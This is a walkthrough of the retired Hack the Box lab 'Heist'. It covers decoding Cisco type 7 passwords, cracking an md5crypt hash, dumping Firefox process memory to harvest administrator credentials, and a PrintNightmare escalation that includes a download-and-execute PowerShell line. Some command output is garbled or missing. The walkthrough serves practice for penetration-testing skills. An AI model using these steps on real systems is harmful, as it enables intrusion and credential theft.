Today we are going to solve another CTF challenge, “Heist”, which is available online for those who want to increase their skill in penetration testing and black box testing. It is a retired vulnerable lab presented by Hack the Box for online penetration practice at your own experience level; they have a collection of vulnerable labs as challenges from beginner to expert level.

Level: Easy

Task: find user.txt and root.txt file on victim’s machine

Let’s start with an nmap scan:

c:\PENTEST>nmap -p-
Starting Nmap 7.70 ( ) at 2019-12-03 21:04 W. Europe Standard Time
Stats: 0:00:14 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
Nmap scan report for
Host is up (0.025s latency).
Not shown: 65530 filtered ports
80/tcp open http
135/tcp open msrpc
445/tcp open microsoft-ds
5985/tcp open wsman
49668/tcp open unknown

Nmap done: 1 IP address (1 host up) scanned in 136.45 seconds

We got http on port 80, smb on port 445, and winrm on port 5985.

Anonymous authentication wasn’t allowed on smb:

root@kali:/htb# smbclient --list //heist.htb/ -U ''
Enter WORKGROUP\'s password: 
session setup failed: NT_STATUS_LOGON_FAILURE

So let’s check the web service.

Web Enumeration

The index page had a login form; however, there was also a guest login option:

After getting in as guest I got this issues page:

A user called hazard posted an issue saying he was having problems with his Cisco router, and he attached the router’s configuration file to the issue.
The configuration file contained usernames and password hashes:

version 12.2
no service pad
service password-encryption
isdn switch-type basic-5ess
hostname ios-1
security passwords min-length 12
enable secret 5 $1$pdQG$o8nrSzsGXeaduXrjlvKc91
username rout3r password 7 0242114B0E143F015F5D1E161713
username admin privilege 15 password 7 02375012182C1A1D751618034F36415408
ip ssh authentication-retries 5
ip ssh version 2
router bgp 100
 bgp log-neighbor-changes
 bgp dampening
 network mask 300.255.255.0
 timers bgp 3 9
 redistribute connected
ip classless
ip route
access-list 101 permit ip any any
dialer-list 1 protocol ip list 101
no ip http server
no ip http secure-server
line vty 0 4
 session-timeout 600
 authorization exec SSH
 transport input ssh

I used a Python script to decode the type 7 passwords:

c:\PENTEST>python -d -p 0242114B0E143F015F5D1E161713
Decrypted password: $uperP@ssword
c:\PENTEST>python -d -p 02375012182C1A1D751618034F36415408
Decrypted password: Q4)sJu\Y8qz*A3?d
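The type 7 scheme the script above reverses, as an added example that is not the author's script: a decoder plus a small audit that walks the credential lines from the config hazard posted and flags both storage types. The XLAT table is Cisco's published constant; `decode_type7`, `audit_config` and the regexes are my own.

```python
import re

# Cisco's fixed XOR table for "type 7" obfuscation. It is public and identical on every
# device, which is why "service password-encryption" only protects against shoulder-surfing.
XLAT = b"dsfd;kfoA,.iyewrkldJKDHSUBsgvca69834ncxv9873254k;fg87"


def decode_type7(encoded: str) -> str:
    """Reverse a type 7 string: two-digit decimal seed, then hex bytes XORed with XLAT."""
    seed = int(encoded[:2])                 # raises ValueError on a non-digit seed
    data = bytes.fromhex(encoded[2:])       # raises ValueError on odd-length / non-hex payload
    return "".join(chr(b ^ XLAT[(seed + i) % len(XLAT)]) for i, b in enumerate(data))


# Lines of interest in a running-config: type 7 is reversible, type 5 is md5crypt (offline-crackable).
TYPE7_RE = re.compile(r"^username (\S+).* password 7 ([0-9A-Fa-f]+)$", re.M)
TYPE5_RE = re.compile(r"^enable secret 5 (\$1\$\S+)$", re.M)


def audit_config(config: str) -> list:
    """Return one finding per weakly stored credential: type 7 entries first, then type 5."""
    findings = []
    for m in TYPE7_RE.finditer(config):
        findings.append({"account": m.group(1), "type": 7,
                         "plaintext": decode_type7(m.group(2)),
                         "note": "reversible; anyone holding the config has the password"})
    for m in TYPE5_RE.finditer(config):
        findings.append({"account": "enable", "type": 5, "plaintext": None,
                         "note": "salted MD5; crackable offline with john/hashcat, prefer type 8 or 9"})
    return findings


# Sample input: the credential lines from the config attached to hazard's issue.
SAMPLE_CONFIG = """\
service password-encryption
enable secret 5 $1$pdQG$o8nrSzsGXeaduXrjlvKc91
username rout3r password 7 0242114B0E143F015F5D1E161713
username admin privilege 15 password 7 02375012182C1A1D751618034F36415408
"""

if __name__ == "__main__":
    for f in audit_config(SAMPLE_CONFIG):
        print(f"{f['account']:<8} type {f['type']}: {f['plaintext'] or '<hash>'}  ({f['note']})")
```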

The other hash I cracked with john:

root@kali:~/Desktop/HTB/boxes/heist# cat hash.txt 
root@kali:~/Desktop/HTB/boxes/heist# john --wordlist=/usr/share/wordlists/rockyou.txt ./hash.txt 
Created directory: /root/.john
Warning: detected hash type "md5crypt", but the string is also recognized as "md5crypt-long"
Use the "--format=md5crypt-long" option to force loading these as that type instead
Using default input encoding: UTF-8
Loaded 1 password hash (md5crypt, crypt(3) $1$ (and variants) [MD5 128/128 AVX 4x3])
Press 'q' or Ctrl-C to abort, almost any other key for status
stealth1agent    (?)
1g 0:00:01:09 DONE (2019-11-29 12:17) 0.01440g/s 50492p/s 50492c/s 50492C/s stealth323..stealth1967
Use the "--show" option to display all of the cracked passwords reliably
Session completed

Enumerating Users –> Shell as Chase –> User Flag

So far we have hazard and rout3r as potential usernames, and stealth1agent, $uperP@ssword and Q4)sJu\Y8qz*A3?d as potential passwords.
I tried different combinations and could authenticate to smb as hazard : stealth1agent; however, there weren’t any useful shares:

root@kali:/htb# smbclient --list //heist.htb/ -U 'hazard'
Enter WORKGROUP\hazard's password: stealth1agent

        Sharename       Type      Comment
        ---------       ----      -------
        ADMIN$          Disk      Remote Admin
        C$              Disk      Default share
        IPC$            IPC       Remote IPC
Reconnecting with SMB1 for workgroup listing.
Connection to heist.htb failed (Error NT_STATUS_IO_TIMEOUT)
Failed to connect with SMB1 -- no workgroup available

Using impacket, I enumerated the other users:

root@kali:~/htb# hazard:stealth1agent@
Impacket v0.9.20-dev - Copyright 2019 SecureAuth Corporation

[*] Brute forcing SIDs at
[*] StringBinding ncacn_np:[\pipe\lsarpc]
[*] Domain SID is: S-1-5-21-4254423774-1266059056-3197185112
500: SUPPORTDESK\Administrator (SidTypeUser)
501: SUPPORTDESK\Guest (SidTypeUser)
503: SUPPORTDESK\DefaultAccount (SidTypeUser)
504: SUPPORTDESK\WDAGUtilityAccount (SidTypeUser)
513: SUPPORTDESK\None (SidTypeGroup)
1008: SUPPORTDESK\Hazard (SidTypeUser)
1009: SUPPORTDESK\support (SidTypeUser)
1012: SUPPORTDESK\Chase (SidTypeUser)
1013: SUPPORTDESK\Jason (SidTypeUser)

Then I could authenticate to winrm as chase : Q4)sJu\Y8qz*A3?d.

I used evil-winrm:

root@kali:/opt/evil-winrm# ./evil-winrm.rb -i heist.htb -u chase -p 'Q4)sJu\Y8qz*A3?d' -s './ps1_scripts/' -e './exe_files/'

Info: Starting Evil-WinRM shell v1.6

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\Chase\Documents> dir
*Evil-WinRM* PS C:\Users\Chase\Documents> cd ..
*Evil-WinRM* PS C:\Users\Chase> cd Desktop
*Evil-WinRM* PS C:\Users\Chase\Desktop> dir

Directory: C:\Users\Chase\Desktop

Mode LastWriteTime Length Name 
---- ------------- ------ ---- 
-a---- 4/22/2019 9:08 AM 121 todo.txt 
-a---- 4/22/2019 9:07 AM 32 user.txt

*Evil-WinRM* PS C:\Users\Chase\Desktop> type user.txt
*Evil-WinRM* PS C:\Users\Chase\Desktop>

Administrator Password from Firefox Process Dump –> Shell as Administrator –> Root Flag

After enumerating the box for a while I noticed that Firefox was installed on the box which is unusual:

*Evil-WinRM* PS C:\Users\Chase\appdata\Roaming> ls

    Directory: C:\Users\Chase\appdata\Roaming
Mode                LastWriteTime         Length Name
----                -------------         ------ ----
d-----        4/22/2019   7:14 AM                Adobe
d---s-        4/22/2019   7:14 AM                Microsoft
d-----        4/22/2019   8:01 AM                Mozilla
*Evil-WinRM* PS C:\Users\Chase\appdata\Roaming> cd Mozilla
*Evil-WinRM* PS C:\Users\Chase\appdata\Roaming\Mozilla> ls

    Directory: C:\Users\Chase\appdata\Roaming\Mozilla

Mode                LastWriteTime         Length Name
----                -------------         ------ ----

d-----        4/22/2019   8:01 AM                Extensions
d-----        4/22/2019   8:01 AM                Firefox
d-----        4/22/2019   8:01 AM                SystemExtensionsDev
*Evil-WinRM* PS C:\Users\Chase\appdata\Roaming\Mozilla> 

And there were some Firefox processes running:

*Evil-WinRM* PS C:\users\chase> ps

Handles  NPM(K)    PM(K)      WS(K)     CPU(s)     Id  SI ProcessName
-------  ------    -----      -----     ------     --  -- -----------
    452      18     2284       5424               404   0 csrss
    292      17     2288       5240               492   1 csrss
    358      15     3544      14652              5232   1 ctfmon
    164       9     1832       9784       0.09   2008   1 dllhost
    258      14     3988      13460              3952   0 dllhost
    623      32    33768      59456                76   1 dwm
   1501      58    23868      78792              5608   1 explorer
   1135      73   153452     493888      38.55   2660   1 firefox
    407      31    17508      63304       4.22   2996   1 firefox
    390      36    79316     111904      96.61   3960   1 firefox
    343      20    10652      38912       1.31   4052   1 firefox
    358      26    16368      37572       1.06   6200   1 firefox

I uploaded procdump.exe (no remote_path is needed if the local file is in the same directory as the evil-winrm.rb file) and dumped one of these processes:

*Evil-WinRM* PS C:\users\chase> .\procdump64.exe -accepteula -ma 2660 firefox.dmp
[14:45:37] Dump 1 initiated: C:\users\chase\firefox.dmp
[14:45:37] Dump 1 writing: Estimated dump file size is 494 MB.
[14:45:41] Dump 1 complete

Next I uploaded strings.exe, ran it on the dump and saved the output to another file:

*Evil-WinRM* PS C:\users\chase> upload strings64.exe c:\users\chase
Info: Uploading strings64.exe to c:\users\chase
Data: 218676 bytes of 218676 bytes copied
Info: Upload successful!
*Evil-WinRM* PS C:\users\chase> cmd /c "strings64.exe -accepteula firefox.dmp > firefox.txt"
cmd.exe : 
+ CategoryInfo : NotSpecified: (:String) [], RemoteException
+ FullyQualifiedErrorId : NativeCommandError
Strings v2.53 - Search for ANSI and Unicode strings in binary images.
Copyright (C) 1999-2016 Mark Russinovich
Sysinternals -
*Evil-WinRM* PS C:\windows\system32\spool\drivers\color> upload strings64.exe
Info: Uploading strings64.exe to C:\windows\system32\spool\drivers\color\strings64.exe

Data: 218676 bytes of 218676 bytes copied

Info: Upload successful!
*Evil-WinRM* PS C:\windows\system32\spool\drivers\color> cmd /c "strings64.exe -accepteula firefox.exe_191129_211531.dmp > firefox.exe_191129_211531.txt"
cmd.exe :
    + CategoryInfo          : NotSpecified: (:String) [], RemoteException
    + FullyQualifiedErrorId : NativeCommandError
Strings v2.53 - Search for ANSI and Unicode strings in binary images.
Copyright (C) 1999-2016 Mark Russinovich
Sysinternals -
*Evil-WinRM* PS C:\windows\system32\spool\drivers\color>

I searched for the word “admin@” and found Administrator’s credentials exposed in some GET requests:

*Evil-WinRM* PS C:\users\chase> findstr "admin@" ./firefox.txt
facebook extension (malware)","created":"2012-02-13T15:41:02Z"},"enabled":true,"versionRange":[{"severity":3,"maxVersion":"*","minVersion":"0","targetApplication":[]}],"id":"79ad1c9b-0828-78

root@kali:/opt/evil-winrm# ./evil-winrm.rb -i heist.htb -u administrator -p '4dD!5}x/re8]FBuZ' -s './ps1_scripts/' -e './exe_files/'

Info: Starting Evil-WinRM shell v1.6

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\Administrator\Documents> cd ..
*Evil-WinRM* PS C:\Users\Administrator> cd Desktop
*Evil-WinRM* PS C:\Users\Administrator\Desktop> dir

Directory: C:\Users\Administrator\Desktop

Mode LastWriteTime Length Name 
---- ------------- ------ ---- 
-a---- 4/22/2019 9:05 AM 32 root.txt

*Evil-WinRM* PS C:\Users\Administrator\Desktop> type root.txt


Beyond Root – PrintNightmare

Heist is vulnerable to CVE-2021-34527, or PrintNightmare.

From chase to Admin, we switch to PowerShell:

puck@parrot-lt:/opt/evil-winrm# ./evil-winrm.rb -i heist.htb -u chase -p 'Q4)sJu\Y8qz*A3?d'

Info: Starting Evil-WinRM shell v1.6

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\Chase\Documents>

I’ll start a webserver in the Invoke-Nightmare directory on my host:

puck@parrot-ls$ ls
CVE-2021-1675.ps1  nightmare-dll
oxdf@parrot$ python3 -m http.server 80
Serving HTTP on port 80 ( ...

If I try to upload a copy and load it, Windows blocks that:

PS C:\programdata> wget -outfile ./in.ps1
PS C:\programdata> ls in.ps1

    Directory: C:\programdata

Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
-a----          7/9/2022   9:38 AM         178561 in.ps1
PS C:\programdata> Import-Module .\in.ps1
Import-Module : File C:\programdata\in.ps1 cannot be loaded because running scripts is disabled on this system. For 
more information, see about_Execution_Policies at https:/
At line:1 char:1
+ Import-Module .\in.ps1
+ ~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : SecurityError: (:) [Import-Module], PSSecurityException
    + FullyQualifiedErrorId : UnauthorizedAccess,Microsoft.PowerShell.Commands.ImportModuleCommand

However, I can just Invoke-Expression (or iex) the code. I can do so right from the webserver:

PS C:\programdata> iex(new-object net.webclient).downloadstring('')

Or from the local copy:

PS C:\programdata> iex(cat in.ps1 -raw)

Either way, the code is now loaded. Now I can run it to add a user:

PS C:\programdata> Invoke-Nightmare -NewUser "puck" -NewPassword "puckpuck"
Invoke-Nightmare -NewUser "puck" -NewPassword "puckpuck"
[+] created payload at C:\Users\chase\AppData\Local\Temp\nightmare.dll
[+] using pDriverPath = "C:\WINDOWS\System32\DriverStore\FileRepository\ntprint.inf_amd64_c62e9f8067f98247\Amd64\mxdwdrv.dll"
[+] added user puck as local administrator
[+] deleting payload from C:\Users\chase\AppData\Local\Temp\nightmare.dll

With admin privileges, I can use wmiexec to get remote execution as SYSTEM:

Author : Puckiestyle
